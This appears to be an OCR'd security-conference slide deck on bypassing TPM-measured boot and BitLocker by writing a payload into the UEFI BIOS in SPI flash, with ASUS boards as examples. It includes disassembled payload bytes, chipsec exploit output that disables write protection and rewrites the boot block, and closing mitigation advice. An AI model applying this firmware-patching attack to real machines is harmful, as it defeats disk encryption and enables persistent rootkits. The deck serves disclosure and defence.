| 003FF704: B900800000                             | 1mov    | ecx,000008000 ;' ¢ '    |
| 003FF709: E461                                   |         | al,061 ;'a'             |
| 003FF70B: 0C03                                   |         | al,3                    |
| 003FF70D: E661                                   | out     | 061,al ;'a'             |
| 003FF70F: 49                                     | 3dec    |                         |
| 003FF710: 75FD                                   | jnz     | 0003FF70F 🛙 3           |
| 003FF712: E461                                   |         | al,061 ;'a'             |
| 003FF714: 24FC                                   | and     | al,-4 ;'"'              |
| 003FF716: E661                                   | out     | 061,al ;'a'             |
| 003FF718: B9FFFF0100                             | mov     | ecx,00001FFFF ;' 🛛 '    |
| 003FF71D: 49                                     | 4dec    |                         |
| 003FF71E: 75FD                                   | jnz     | 0003FF71D124            |
| 003FF720: 4B                                     | dec     | ebx                     |
| 003FF721: 740C                                   |         | 0003FF72F 🛛 5           |
| 003FF723: 83FB06                                 | стр     | ebx,6                   |
| 003FF726: 77DC                                   |         | 0003FF704⊡1             |
| 003FF728: 83FB03                                 | стр     | ebx,3                   |
| 003FF72B: 77D0                                   |         | 0003FF6FD126            |
| 003FF72D: EBD5                                   | jmps    | 0003FF704121            |
| 003FF72F: 90909090909090909090909090909          |         |                         |
| 003FF73E: 9090909090909090909090909090909        |         |                         |
| 003FF74D: 90909090909090909090909090909          |         |                         |
| 003FF75C: 90909090909090909090909090909          |         |                         |
| 003FF76B: 9090909090909090909090909090909        |         |                         |
| 003FF77A: 90909090909090909090909090909090909090 | 090 nop |                         |
| 003FF789: 9090909090909090909090909090909090909  | 090 nop |                         |

- nac

# Writing Payload to Early BIOS in SPI Flash

| OS : Windows 7 6.1.7600 AMD64<br>Chipset:                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                               |  |
|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--|
| VID: 8086<br>DID: 0100                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  |  |
| Name: Sandy Bridge (SNB)<br>Long Name: Sandy Bridge CPU / Cougar Point PCH                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              |  |
| <pre>[+] loaded exploits.bios.bitlocker<br/>[+] imported chipsec.modules.exploits.bios.bitlocker<br/>[*] Reading 0x1000-byte block from SPI at FLA = 0x3FF000<br/>[*] Done reading block from SPI at FLA = 0x3FF000<br/>[*] Filing with 0x109 bytes of NOP slide.<br/>[*] Injecting 0x47 bytes of payload at offset 0x6E8 in the block<br/>[*] Checking protection of UEFI BIOS region in SPI flash<br/>[spi] UEFI BIOS write protection enabled but not locked. Disabling<br/>[*] Theoremain or a state protection is disabled<br/>[*] Erasing original 0x1000-byte SPI block at FLA = 0x3FF000<br/>[*] Done erasing block of SPI flash<br/>[*] Writing SPI block with payload to FLA = 0x3FF000 (payload at 0x3FF6E8)<br/>[*] Done writing modified UEFI BIOS boot block in SPI flash<br/>[*] Done writing modified UEFI BIOS boot block volume</pre> |  |

▲□▶ ▲□▶ ▲三▶ ▲三▶ 三三 のへで

## BitLocker Decrypted Drive With Patched UEFI BIOS



### But That P67 Board Is Just Too Old



## ASUS P8Z77-V PRO



Yes! UEFI BIOS updates are signed

## ASUS P8Z77-V PRO



Yes! UEFI BIOS updates are signedNIST will be happy

### Or Not Yet

[+] imported chipsec.modules.common.bios\_wp [x] [ Module: BIOS Region Write Protection BIOS Control (BDF  $0:31:0 + 0 \times DC$ ) =  $0 \times 08$ SMM\_BWP = 0 (SMM BIOS Write Protection) [05] [04] TSS = 0 (Top Swap Status) [01] BLE = 0 (BIOS Lock Enable) BIOSWE = 0 (BIOS Write Enable) [00] [-] FAILED: BIOS region write protection is disabled [\*] BIOS Region: Base = 0x00180000, Limit = 0x007FFFFF SPI Protected Ranges ------PRx (offset) | Value | Base | Limit | WP? | RP? PR0 (74) | 00000000 | 00000000 | 00000000 | 0 10 PR1 (78) | 0000000 | 0000000 | 0000000 | 0 10 1 00000000 1 0<u>0000000 1 00000000 1 0</u> IA PR2 (7C) 1 00000000 1 00000000 1 00000000 1 0 IA PR3 (80) 1 00000000 1 00000000 1 00000000 1 0 10 PR4 (84) [-] FAILED: Nome of the SPI protected ranges write-protect BIOS region fs0:\chipsec-1.0> \_

- The problem applies to any Full-Disk Encryption solution with TPM, not just Windows BitLocker
- It also is not specific to ASUS. I just happen to use a few of those systems

## Outline

#### **1** UEFI BIOS

- 2 Measured/Trusted Boot
- **3** The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

- 4 Windows BitLocker with TPM
- 5 Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

## What About Secure Boot?

#### UEFI 2.3.1 / Windows 8 Secure Boot

- UEFI FW verifies digital signatures of non-embedded UEFI executables
- Signed UEFI drivers on adaptor cards/disk (Option ROMs), UEFI apps, OS Loaders
- Leverages Authenticode signing over PE/COFF binaries
- Configuration stored in NVRAM as Authenticated Variables (PK, KEK, db, dbx, SecureBoot)

- UEFI Spec, Chapter 27
- Windows 8 Logo requirements for Secure Boot

### Windows 8 Logo Requirements

#### System.Fundamentals.Firmware.UEFISecureBoot

8. Mandatory. Secure firmware update process. If the platform firmware is to be serviced, it must follow a secure update process. To ensure the lowest level code layer is not compromised, the platform must support a secure firmware update process that ensures only signed firmware components that can be verified using the signature database (and are not invalidated by the forbidden signature database) can be installed. UEFI Boot Services variables must be hardware-protected and preserved across flash updates. The Flash ROM that stores the UEFI BIOS code must be protected. Flash that is typically open at reset (to allow for authenticated firmware updates) must subsequently be locked before running any unauthorized code. The firmware update process must also protect against rolling back to insecure versions, or non-production versions that may disable secure boot or include nonproduction keys. A physically present user may however override the rollback protection manually. Further, it is recommended that manufacturers writing BIOS code adhere to the NIST guidelines set out in NIST SP 800-147 (http://csrc.nist.gov/publications/nistpubs/800-147/NIST-SP800-147-April2011.pdf), BIOS Protection Guidelines, which provides guidelines for building features into the BIOS that help protect it from being modified or corrupted by attackers. For example, by using cryptographic digital signatures to authenticate BIOS updates.

## Outline

#### 1 UEFI BIOS

- 2 Measured/Trusted Boot
- **3** The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

- 4 Windows BitLocker with TPM
- **5** Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

- BIOS Rootkit [5,6,7,15]
- SMM Rootkit [8,9]
- ACPI rootkit [12]
- Mebromi BIOS/Option ROM malware in the wild [14]

▲ロト ▲御 ト ▲ 臣 ト ▲ 臣 ト の Q @

- BIOS Rootkit [5,6,7,15]
- SMM Rootkit [8,9]
- ACPI rootkit [12]
- Mebromi BIOS/Option ROM malware in the wild [14]
- If we don't properly protect the BIOS, malware will
  Imagine BIOS malware restoring TDL4 infected MBR on each boot

## Outline

#### **1** UEFI BIOS

- 2 Measured/Trusted Boot
- **3** The Real World: Bypassing Measured/Trusted Boot

◆□▶ ◆□▶ ◆三▶ ◆三▶ 三三 のへぐ

- 4 Windows BitLocker with TPM
- **5** Secure Boot
- 6 What Else?
- 7 Anything We Can Do?

## Anything We Can Do?

#### If you care about Full-Disk Encryption or sneaky little UEFI malware

- ASUS is releasing fixed revision of UEFI BIOS. Update!
- Check with platform vendor if BIOS updates are signed and if BIOS meets NIST SP800-147 requirements
- Systems certified for Windows 8 are likely to sign UEFI updates
- Check UEFI BIOS protections on your system
- Do not leave your system unattended
- Do not enter PIN if concerned that BIOS was compromised
- Stop using systems with legacy BIOS
- NIST should have a test suite to validate SP800-147 requirements

CSW organizers and review board

ASUS for openly working with us on mitigations

apebit, Kirk Brannock, chopin, doughty, Efi, Laplinker, Lelia, Dhinesh Manoharan, Misha, Bruce Monroe, Monty, Nick, Brian Payne, rfp, secoeites, sharkey, toby, Vincent

And many others whom I deeply respect

Graphics from <a href="http://www.deviantart.com">http://www.deviantart.com</a>

## Further Reading

- 1 Evil Maid goes after TrueCrypt! by Alex Tereshkin and Joanna Rutkowska
- 2 Attacking the BitLocker Boot Process by Sven Turpe et al.
- 3 Anti Evil Maid by Joanna Rutkowska
- 4 Go Deep Into The Security of Firmware Update by Sun Bing
- 5 Persistent BIOS Infection by Anibal Sacco and Alfredo Ortega
- 6 Hardware Backdooring is Practical by Jonathan Brossard
- 7 Mac EFI Rootkits by snare
- 8 Real SMM Rootkit: Reversing and Hooking BIOS SMI Handlers by core collapse
- 9 New Breed of Stealthy Rootkits by Shawn Embelton and Sherry Sparks
- 10 Attacking Intel BIOS by Rafal Wojtczuk and Alexander Tereshkin
- 11 Firmware Rootkits: The Threat to The Enterprise by John Heasman
- 12 Implementing and Detecting an ACPI BIOS Rootkit by John Heasman
- 13 BIOS Boot Hijacking by Sun Bing
- 14 Mebromi
- 15 BIOS RootKit: Welcome Home, My Lord by IceLord
- 16 Hardware Involved Software Attacks by Jeff Forristal
- 17 Beyond BIOS by Vincent Zimmer
- 18 http://archives.neohapsis.com/archives/bugtraq/2009-08/0059.html

▲□▶ ▲圖▶ ▲臣▶ ▲臣▶ ―臣 – 釣�?



#### **QUESTIONS?**

